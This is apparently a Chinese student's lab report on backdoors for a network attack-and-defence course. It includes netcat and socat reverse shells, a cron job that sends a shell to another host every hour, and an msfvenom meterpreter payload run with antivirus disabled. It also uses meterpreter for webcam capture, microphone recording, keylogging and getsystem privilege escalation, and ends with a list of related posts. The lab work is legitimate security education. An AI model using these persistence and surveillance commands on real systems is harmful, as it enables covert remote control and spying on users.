20155232《网络对抗》Exp2 后门原理与实践
20155232《网络对抗》Exp2 后门原理与实践
问题回答
- 1.例举你能想到的一个后门进入到你系统中的可能方式?
通过网页上弹出来的软件自动安装
- 2.例举你知道的后门如何启动起来(win及linux)的方式?
更改注册表,自启动方式。
跟正常的软件捆绑起来
- 3.Meterpreter有哪些给你映像深刻的功能?
击键记录还有获取摄像头权限进行拍照。击键记录可以在这段时间内截获到你写的内容或者数据,如果是机密性的东西,就很麻烦了。。获取摄像头权限有种被监视的感觉。。。。
- 4.如何发现自己有系统有没有被安装后门?
通过防火墙还有杀毒软件等还可以观察注册表里的进程。
常用后门工具实践
Windows获得Linux Shell
1.在Windows下,先使用ipconfig指令查看本机IP
2.使用ncat.exe程序监听本机的5233端口:
3.在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5232端口:
弹出防火墙警告:
允许访问即可
4.Windows下成功获得了一个Kali的shell,运行ls指令如下:
2.2Linux获得Windows Shell
1.在Kali环境下用ifconfig查看IP
2.使用nc指令监听5232端口:
3.在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的5232端口:
4.Kali下可以看到Windows的命令提示,可以输入Windows命令:
2.3使用nc传输数据
1.Windows下监听5232端口:
2.Kali下连接到Windows的5232端口
3.建立连接之后,就可以传输数据了,这里传输的是字符串,相当于两台主机在聊天,也可以用重定向操作符来传输文件:
3.1 使用netcat获取主机操作Shell,cron启动
1.先在Windows系统下,监听5232端口:
2.在Kali环境下,使用
man crontab
指令查看crontab命令的帮助文档,从文档中可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。
kali系统内每分钟自动运行指令,反弹至pc端的5232端口
3.用
crontab -e
指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:
4.在最后一行添加
18 * * * * /bin/netcat 10.1.1.141 5232 -e /bin/sh
,意思是在每个小时的第18分钟反向连接Windows主机的5232端口,就会启动cron。设置成18的原因是我当时的时间是16点15,为了能立马看到效果,所以我将时间设置在了3分钟以后:
问题
在这里遇到了一些小问题,在执行这些命令之后,windows的cmd这里在时间到的时候输入dir命令没有任何反应。
解决
后来发现在最开始选择编辑器那里选择错了编辑器,
/bin/nano
没有用vim,所以在输入的时候不会使用。后面再上网搜索如何更改crontab的编辑器:
只需要输入
sudo select-editor
$ sudo select-editor
Select an editor. To change later, run 'select-editor'.
1. /bin/ed
2. /bin/nano <---- easiest
3. /usr/bin/vim.basic
4. /usr/bin/vim.tiny
Choose 1-4 [2]: 3
再用
crontab -e
指令:
在最后一行添加
04 * * * * /bin/netcat 10.1.1.141 5232 -e /bin/sh
问题
在这样修改之后还是不能执行指令,于是上网搜索问题
发现本机时间和虚拟机时间不一致导致问题的出现:
解决
虚拟机时间:
本机时间:
修改时间设置:
输入相关指令,等待。。。。。
在19点31分时输入ls即可显示:
成功!~~
3.2使用socat获取主机操作Shell, 任务计划启动
1.在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
2.下载安装socat软件,下载地址[https://gitee.com/wildlinux/NetSec/attach_files]
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写
tcp-listen:5232 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe绑定到端口5232,同时把cmd.exe的stderr重定向到stdout上:
3.创建完成之后,可以windows+L锁定计算机让它执行
弹出警告:
4.Linux下使用
socat - tcp:Win的IP:端口命令
,此时已经获取了Win的shell,可以查看想知道的东西。
3.3 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.255 LPORT=5232 -f exe > 20155232.exe
生成后门程序:
2.通过nc指令将生成的后门程序传送到Windows主机上:(在做这一步之前先将本机的杀毒软件和防火墙关闭)
3.windows上输入:
4.在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
5.exploit:MSF开始监听
6.打开Windows上的后门程序:
20155232_backdoor.exe
7.此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
3.4使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.使用
record_mic
指令可以截获一段音频:
2.使用
webcam_snap
指令可以使用摄像头进行拍照:
3.使用
webcam stream
指令可以使用摄像头进行录像
4.使用
screenshot
指令可以进行截屏:
5.使用
keyscan_start
指令开始记录下击键的过程,使用
keyscan_dump
指令读取击键的记录
6.先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功
问题
在使用getuid指令查看当前用户,使用getsystem指令进行提权时出现问题:
解决
1.参考链接
2.参考
总结
经过这次试验体验了一次黑客的感觉哈哈~感觉这次试验非常的有趣,本次实验的主要步骤就在于MSF这部分,这部分很容易出错,所以做了很多遍才成功。这次实验后,我的感触最深的就是要加强电脑的安全属性,经常查杀清理,还要预防防止一些恶意软件。
20155232《网络对抗》Exp2 后门原理与实践的更多相关文章
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155302 Exp2 后门原理与实践
20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
随机推荐
- Maven学习(一)概念简述和安装教程
刚开始由.net转向java,公司的项目中就开始使用maven,感觉他就像nuget一样,但是他又比nuget要强大(毕竟他是项目管理工具). maven概述 在这里,就不背书包了,怎么简单直接怎么来 ...
- 浅析ARM公司在物联网领域的战略布局
From: http://www.cnblogs.com/yefanqiu/p/3447769.html 浅析ARM公司在物联网领域的战略布局 随着ARM芯片的出货量越来越多,自信满满的ARM公司统一 ...
- [iOS] 输入框高度随输入内容变化
一般,类似聊天软件的输入框默认都是显示一行的,在用户输入过程中根据输入文字的内容来改变输入框的高度,以便显示全部文字.像微信,QQ的输入框就是这样的.那么这个效果应该怎么实现呢? 新博客:wosson ...
- CSS 实例之滚动的图片栏
在一些网站上可以经常看到有一些图片进行持续不断的滚动,这个效果可以通过css的动画效果来实现.具体效果如下 主要原理是通过动画向左移动. 首先给出两组一样的图片(同一行上),让整体图片向左移动一组图片 ...
- chrome中workspace配置达到同步修改本地文件的作用
在前端开发中,我们经常需要在浏览器中进行调试,特别是一些样式的修改,如果你还是先在浏览器elements中调试好在复制到本地文件,那就真的out了. chrome浏览器的workspace功能完全可以 ...
- 安装并使用pt-ioprofile
pt-ioprofile,是一个percona的性能分析工具,可以查看进程输出.输入,打印一些表文件及活动IO.pt-ioprofile是一个只读工具,所以对数据没风险.由于网上对pt-ioprofi ...
- 使用MyEclipse建立working set
1.用eclipse或者MyEclipse开发久了后,会有很多的项目,就算关闭了还会有很多,这是需要建立一个working set,相当在工作区中建立项目文件夹分类放自己做过的一些项目. 如下图: ...
- MySQL 8.0有什么新功能
https://mysqlserverteam.com/whats-new-in-mysql-8-0-generally-available/ 我们自豪地宣布MySQL 8.0的一般可用性. 现在下载 ...
- JavaScript原型链基础(prototype chain)
1.函数基础 2.对象基础 3.原型链基础
- MySQL基础之 LIKE操作符
LIKE操作符 作用:用于在WHERE子句中搜索列中的指定模式. 语法:SELECT COLUMN_NAME FROM TABLE_NAME WHERE COLUMN_NAME LIKE ...